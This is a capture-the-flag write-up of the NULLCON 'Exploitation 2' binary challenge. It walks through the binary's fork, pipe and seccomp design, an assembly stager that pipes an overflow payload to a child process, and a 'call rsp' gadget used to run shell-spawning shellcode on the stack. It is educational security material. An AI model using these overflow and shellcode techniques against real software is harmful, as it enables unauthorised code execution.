# NULLCON: Exploitation 2

**Category:** Binary Exploitation
**Points:** 300
**Total Solves:** Not Available
## Problem Description:
![Image](ProblemStatement.png?raw=true "Problem Statement")

## Write-up
I am a beginner, and this is one of the hardest exploits I have done. To solve it I teamed up with my buddy Grant, who was kind
enough to let me solve this one on my own and guided me through the process. After downloading the binary, [pwn2-box.bin](pwn2-box.bin), we first looked at basic information about the file (architecture, enabled mitigations, etc.) with the command `checksec pwn2-box.bin`, which gave this:
```
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
```

This told us a few things; let's look at them one by one.
`Arch: amd64-64-little` tells us that the architecture is amd64, which means we will be dealing with 64-bit
registers. `little` tells us that the executable is built for a little-endian machine.

`RELRO`, aka Relocation Read-Only, is `Partial RELRO`, which means the ELF (Executable and Linkable Format) file
has .plt and .got.plt sections, where .plt is read-only but .got.plt is
writable. Just for additional info, .plt is the Procedure Linkage Table and
.got is the Global Offset Table; .got.plt is the part of the GOT used by the .plt section. With Full RELRO, lazy
binding (resolving a symbol the first time it is called) is disabled, so the dynamic linker resolves all symbols at load
time (when the program starts). The GOT is therefore populated at load time and then
marked read-only, so with Full RELRO there is no writable .got.plt left to overwrite. If you want to read more about the .plt and .got.plt sections, [read here](https://systemoverlord.com/2017/03/19/got-and-plt-for-pwning.html), and about RELRO, [read here](https://mudongliang.github.io/2016/07/11/relro-a-not-so-well-known-memory-corruption-mitigation-technique.html).

There is no stack canary, so a stack buffer overflow can overwrite the return address without being detected.

NX is disabled, which means code can be executed on the stack and heap. With NX enabled, no segment would be both writable and executable (W^X), and the OS would enforce each segment's permissions: for example, bytes in a segment that is not marked executable could not be run as code.

No PIE means the binary is loaded at a fixed base address (0x400000), so its code and data live at fixed addresses that are known before the program runs.

By then, we had a pretty good idea of the attack vectors we could use against the program.

As it's Partial RELRO, we could modify the resolved addresses of symbols to change the control flow, so it was worth looking at the symbols present in the binary. We checked them as follows:
```
$nm pwn2-box.bin
nm: pwn2-box.bin: no symbols
```
Huh, no symbols: the symbol table is stripped. So we looked at the dynamic symbols instead:
```
$ objdump -T pwn2-box.bin

pwn2-box.bin: file format elf64-x86-64

DYNAMIC SYMBOL TABLE:
0000000000000000 DF *UND* 0000000000000000 seccomp_init
0000000000000000 w D *UND* 0000000000000000 _ITM_deregisterTMCloneTable
0000000000000000 DF *UND* 0000000000000000 seccomp_rule_add
0000000000000000 DF *UND* 0000000000000000 GLIBC_2.2.5 getpid
0000000000000000 DF *UND* 0000000000000000 seccomp_load
0000000000000000 DF *UND* 0000000000000000 GLIBC_2.2.5 mmap
0000000000000000 DF *UND* 0000000000000000 GLIBC_2.2.5 __assert_fail
0000000000000000 DF *UND* 0000000000000000 GLIBC_2.2.5 memset
0000000000000000 DF *UND* 0000000000000000 GLIBC_2.2.5 alarm
0000000000000000 DF *UND* 0000000000000000 GLIBC_2.2.5 pipe
0000000000000000 DF *UND* 0000000000000000 GLIBC_2.2.5 read
0000000000000000 DF *UND* 0000000000000000 GLIBC_2.2.5 __libc_start_main
0000000000000000 DF *UND* 0000000000000000 GLIBC_2.2.5 signal
0000000000000000 w D *UND* 0000000000000000 __gmon_start__
0000000000000000 DF *UND* 0000000000000000 GLIBC_2.2.5 perror
0000000000000000 w D *UND* 0000000000000000 _Jv_RegisterClasses
0000000000000000 DF *UND* 0000000000000000 GLIBC_2.2.5 exit
0000000000000000 w D *UND* 0000000000000000 _ITM_registerTMCloneTable
0000000000000000 DF *UND* 0000000000000000 GLIBC_2.2.5 fork
00000000006020a0 g D .data 0000000000000000 Base _edata
00000000006020a8 g D .bss 0000000000000000 Base _end
00000000006020a0 g D .bss 0000000000000000 Base __bss_start
0000000000400820 g DF .init 0000000000000000 Base _init
0000000000400ec4 g DF .fini 0000000000000000 Base _fini

```
A few symbols worth noticing were: the seccomp functions; mmap (memory is mapped into the program
at run time); memset (fills memory); alarm (delivers SIGALRM after a timeout); pipe and fork together (some
inter-process communication might be going on between the child and parent processes); read (reads
data); signal (registers a signal handler); perror (prints an error message); and exit (exits the
program).

At this point we were ready to look at the disassembled code of the binary. It told us
that the program creates a pipe and then forks a child process. The behavior of both processes,
child and parent, is described below.

The parent process registers a signal handler for a few signals,
the one worth mentioning being `SIGALRM`. The handler gets the PID and exits the program with code 1. The alarm
is set for 5 seconds, which means the program is not going to run longer than that. After setting the alarm,
the parent reads 4 bytes from STDIN, treats them as an integer, and checks that it is less than
0x100000; if not, it prints the error message "error" and exits. Otherwise, it
allocates memory of that size at a random location using mmap. It then sets up seccomp rules
so that only the write, exit and exit\_group syscalls can be made. Next comes the interesting part: after setting up those seccomp rules,
it reads up to the size of the allocated memory from STDIN, writes it to the allocated memory, and then
executes it. This means any shellcode we provide is going to be executed, but it can only make
write, exit and exit\_group calls; otherwise we could simply have passed shellcode to read the flag stored in
/flag.txt. Another important thing was to patch out the alarm instructions in the binary, otherwise
it is hard to debug, because `alarm` triggers the handler and the handler exits the program.
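
The input the parent expects on STDIN can be sketched in Python as below. This is only an illustration of the protocol described above, not the actual solve script: the helper name `build_parent_input` is hypothetical, and it assumes the 4-byte size is read as a little-endian unsigned integer.

```python
import struct

MAX_SIZE = 0x100000  # upper bound the parent checks, per the disassembly


def build_parent_input(shellcode: bytes) -> bytes:
    """Return the bytes to send on STDIN: a 4-byte size, then the shellcode."""
    size = len(shellcode)
    if size >= MAX_SIZE:
        # The parent would print "error" and exit in this case.
        raise ValueError("size must be below 0x100000")
    # Assumption: the size is interpreted as a little-endian 32-bit integer.
    return struct.pack("<I", size) + shellcode


# Placeholder bytes only, not a real payload.
demo = build_parent_input(b"\x90" * 3)
```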

Now the child process: it reads 1 byte from the read end of the pipe and compares it with 0xA. If it matches, it reads 4 more
bytes, treats them as an integer, and then reads that many bytes
from the read end of the pipe and stores them in a buffer on the stack.
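
As a rough model of the child's parsing logic, here is a short Python sketch. The function name `child_read_message` is made up for illustration, the pipe is modelled with an in-memory stream, and the length is assumed to be little-endian. The real child copies the bytes into a fixed-size stack buffer, which is the part this model cannot show.

```python
import io
import struct


def child_read_message(pipe) -> bytes:
    """Model of the child: marker byte, 4-byte length, then that many bytes."""
    marker = pipe.read(1)
    if marker != b"\x0a":
        return b""  # marker mismatch: nothing more is read in this model
    # Assumption: the length is a little-endian unsigned 32-bit integer.
    (size,) = struct.unpack("<I", pipe.read(4))
    # In the binary these bytes land in a stack buffer, whatever `size` is.
    return pipe.read(size)


message = child_read_message(io.BytesIO(b"\x0a\x03\x00\x00\x00abcXYZ"))
```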

From this the exploit seemed clear: write shellcode, which gets written to the mmapped memory and
executed. As it could only make the write system call, it was clear that we needed to pass the
exploit on to the child process. Our shellcode could do that by writing it to the write end of the pipe; the child process would then store it on its stack. My first approach was a buffer overflow: overwrite the return address with the address of the part of my shellcode stored in the parent process's mmapped memory, which upon execution would give me a shell.

So my whole shellcode breakdown was going to be like this:
```
complete shellcode = [[stager][piped content][shell code to get bash]]
piped content = [0xA][sizeof stack content][stack content]
stack content = [[0x78*'a'] + [address of shellcode to get bash]]
```

The stager is shellcode that figures out the address of the piped content and writes that content to the
pipe, from the parent process to the child process. Initially the address of the shell-spawning shellcode is not known, so
the stager also fills in that address, since it can work out where [stack content]
starts.

The piped content is processed by the child process, which reads it from the read end of the pipe. It starts with 0xA to satisfy the condition. The size of the stack content is read next by the child as SIZE, then SIZE bytes are read from the pipe and stored on the stack, which causes the buffer overflow and returns control to my shellcode to give me a shell.

The stack content is larger than the buffer allocated on the stack, so it overwrites
the saved RBP and places the address of [shell code to get bash] in the slot right after it, which holds the return address.
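
The layout above can be written out as a small Python sketch. The helper names are hypothetical, the little-endian packing follows from the architecture, and the return address is left as a placeholder 0 because it is only known at run time.

```python
import struct

FILLER_LEN = 0x78  # bytes of 'a' before the return address, from the layout above


def build_stack_content(ret_addr: int) -> bytes:
    """Filler up to the return-address slot, then the 8-byte address."""
    return b"a" * FILLER_LEN + struct.pack("<Q", ret_addr)


def build_piped_content(stack_content: bytes) -> bytes:
    """0xA marker, 4-byte length of the stack content, then the content."""
    return b"\x0a" + struct.pack("<I", len(stack_content)) + stack_content


# 0 is a placeholder; the real address has to be filled in at run time.
piped = build_piped_content(build_stack_content(0))
piped_size = len(piped)  # 1 + 4 + 0x78 + 8 bytes
```

The total comes to 0x85 bytes, which is the size constant the stager has to use when it writes the piped content to the pipe.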

Below is my stager code:
```
jmp short label1              ; jump forward so the call below can push an address
pop_addr:
pop rsi                       ; rsi = address of the piped content (pushed by the call)
mov rax, rsi
add rax, 0x85                 ; skip the piped content (0x85 bytes)
mov [rsi + 0x85 - 8], rax     ; store that address in the return-address slot
xor rax, rax
mov al, 1                     ; syscall number 1: write
xor rdi, rdi
mov rdi, 4                    ; fd 4: the pipe descriptor
xor rdx, rdx
mov dl, 0x85                  ; number of bytes to write
syscall
label1:
call pop_addr                 ; pushes the address of the bytes that follow
; the piped content goes here
; below it is the other shellcode that gives sh
```
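
To check the stager's address arithmetic without running it, its effect can be simulated in Python. This is a sketch under assumptions: `simulate_stager`, the base address and the offset used in the example are all invented for illustration, and the mmapped region is modelled as a plain `bytearray`.

```python
import struct

PIPED_SIZE = 0x85  # size of the piped content used by the stager


def simulate_stager(memory: bytearray, base: int, piped_off: int) -> bytes:
    """Mimic the stager: patch the return-address slot, return the bytes written.

    `memory` models the mmapped region loaded at address `base`;
    `piped_off` is the offset of the piped content inside it.
    """
    rsi = base + piped_off    # what `pop rsi` yields after the call
    rax = rsi + PIPED_SIZE    # address just past the piped content
    slot = piped_off + PIPED_SIZE - 8
    memory[slot:slot + 8] = struct.pack("<Q", rax)  # mov [rsi + 0x85 - 8], rax
    # write(4, rsi, 0x85) would send exactly these bytes down the pipe
    return bytes(memory[piped_off:piped_off + PIPED_SIZE])


region = bytearray(0x200)  # hypothetical region contents
written = simulate_stager(region, base=0x7F0000000000, piped_off=0x20)
patched_addr = struct.unpack("<Q", written[-8:])[0]
```

The last 8 bytes of what gets written hold the address of whatever follows the piped content in the parent's memory.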

The plan seemed perfect. I put hours of effort into debugging and writing the script, then executed it to get the flag, aaaaand... I got a memory access violation. The shellcode I was trying to execute to get sh was in mmapped memory that belonged to the parent process, and I was trying to execute it from the child process. I didn't do a good job of looking ahead. Well, lesson learned. But now I had a bigger issue: how to execute my shellcode to get the shell.

Then my buddy Grant pointed me toward ROP and using an RSP gadget. I was not aware of this awesome technique, so I am going to write a bit about it too. Gadgets are instructions that are already present in the program and can be executed if one knows their addresses at run time. As in this case there is no ASLR and no PIE, if I could find an instruction that does `call rsp`, I could run my shellcode on the stack, and the gadget's address is not going to change because there is no PIE. Searching the binary for this gadget, I found one that could help me execute the shellcode:

```
$ ROPgadget --binary CTFs/NULLCON/Binary-Exploit/Exploitation-2/pwn2-box.bin | grep "call rsp"
0x0000000000400f7b : call rsp
```
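
For the curious, a gadget search like this boils down to scanning the file for the instruction's bytes. `call rsp` encodes as `ff d4` on x86-64, so a simplified Python sketch (not how ROPgadget is actually implemented, and with a hypothetical helper name) could look like the following. It returns offsets into the byte blob; turning a file offset into a virtual address depends on the ELF program headers, which this sketch does not handle.

```python
from typing import List

CALL_RSP = b"\xff\xd4"  # x86-64 machine code for `call rsp`


def find_gadget(blob: bytes, pattern: bytes = CALL_RSP) -> List[int]:
    """Return every offset in `blob` where `pattern` occurs."""
    offsets = []
    start = blob.find(pattern)
    while start != -1:
        offsets.append(start)
        start = blob.find(pattern, start + 1)
    return offsets


# Synthetic bytes for demonstration, not taken from the real binary.
sample_offsets = find_gadget(b"\x90\xff\xd4\x00\xff\xd4")
```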

The new plan was not much different from the old one, just some changes here and there. I planned my new full shellcode to look like this:

```
complete shellcode = [[stager][piped content]]
piped content = [0xA][sizeof stack content][stack content]
stack content = [[0x78*'a'] + [address of ROP gadget] + [shell code to give bash]]
```

The change is that my shellcode to get sh is now written onto the stack by the buffer overflow,
and the return address points to the gadget. When the return instruction executes, RSP is
incremented by 8 and points to my shellcode; when the `call rsp` gadget then executes,
control goes to the shellcode, which gives the shell. The whole thing was put in the [script](solve.py). Executing this script gave me a shell.
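
A minimal Python sketch of the new piped content is shown below. It is not the actual solve.py: the helper name is hypothetical, the shellcode passed in is a placeholder, and the only concrete values are the 0x78 filler length and the gadget address from the ROPgadget output above.

```python
import struct

CALL_RSP_GADGET = 0x400F7B  # address of `call rsp` reported by ROPgadget
FILLER_LEN = 0x78           # filler before the return-address slot


def build_final_piped_content(shellcode: bytes) -> bytes:
    """[0xA][size][filler + gadget address + shellcode], as in the layout above."""
    stack_content = (
        b"a" * FILLER_LEN
        + struct.pack("<Q", CALL_RSP_GADGET)  # overwrites the return address
        + shellcode                           # sits right where RSP points after ret
    )
    return b"\x0a" + struct.pack("<I", len(stack_content)) + stack_content


# b"\xcc" * 4 is a stand-in, not real shell-spawning shellcode.
final_piped = build_final_piped_content(b"\xcc" * 4)
```

Since the piped content now grows with the shellcode, the length the stager passes to write would presumably need to match `len(final_piped)` instead of the earlier 0x85.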

Thanks to @Digital\_Cold for guidance.
## Other write-ups and resources

* None

Original writeup (https://github.com/viz-prakash/CTF/tree/master/CTF-writeups-2018/NULLCON/Binary-Exploitation/Exploitation-2).